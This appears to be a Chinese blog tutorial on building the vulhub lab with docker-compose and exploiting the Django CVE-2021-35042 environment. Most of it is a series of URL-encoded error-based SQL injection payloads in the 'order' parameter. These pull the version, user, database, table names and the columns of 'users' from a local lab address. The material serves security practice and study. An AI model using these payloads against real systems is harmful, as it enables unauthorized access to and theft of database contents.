赞
踩
Web安全:iwebsec || vulhub 靶场搭建.(各种漏洞环境集合,一键搭建漏洞测试靶场)_iwebsec靶场-CSDN博客
- (1)cd vulhub
-
- (2)ls
- (1)cd django // 切换到对应的漏洞目录.
-
- (2)cd CVE-2021-35042 // 切换到对应的漏洞版本.
-
- (3)docker-compose build // 建立容器
-
- (4)docker-compose up -d // 启用漏洞环境.
-
- (5)docker ps // 查看环境运行状态
- 例如:
-
- http://172.16.10.19:8000//vuln/?order=后面就是写SQL语句的查询.
/vuln/?order=vuln_collection.name);select%20updatexml(1,%20concat(0x7e,(select%20@@basedir)),1)%23
/vuln/?order=vuln_collection.name);select updatexml(1, concat(0x7e,(select @@version)),1)%23
http://172.16.10.19:8000/vuln/?order=vuln_collection.name%29;select%20updatexml%281,%20concat%280x7e,%28select%20user%28%29%29%29,1%29%23
http://172.16.10.19:8000/vuln/?order=vuln_collection.name%29;select%20updatexml%281,%20concat%280x7e,%28select%20database%28%29%29%29,1%29%23
http://172.16.10.19:8000/vuln/?order=vuln_collection.name%29;select%20updatexml%281,%20concat%280x7e,%28select%20group_concat%28table_name%29%20from%20information_schema.tables%20where%20table_schema=database%28%29%29%29,1%29%23
http://172.16.10.19:8000/vuln/?order=vuln_collection.name%29;select%20updatexml%281,concat%280x5c,%28select%20column_name%20from%20information_schema.columns%20where%20table_name=%27users%27%20limit%200,1%29,0x5c%29,1%29%23
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。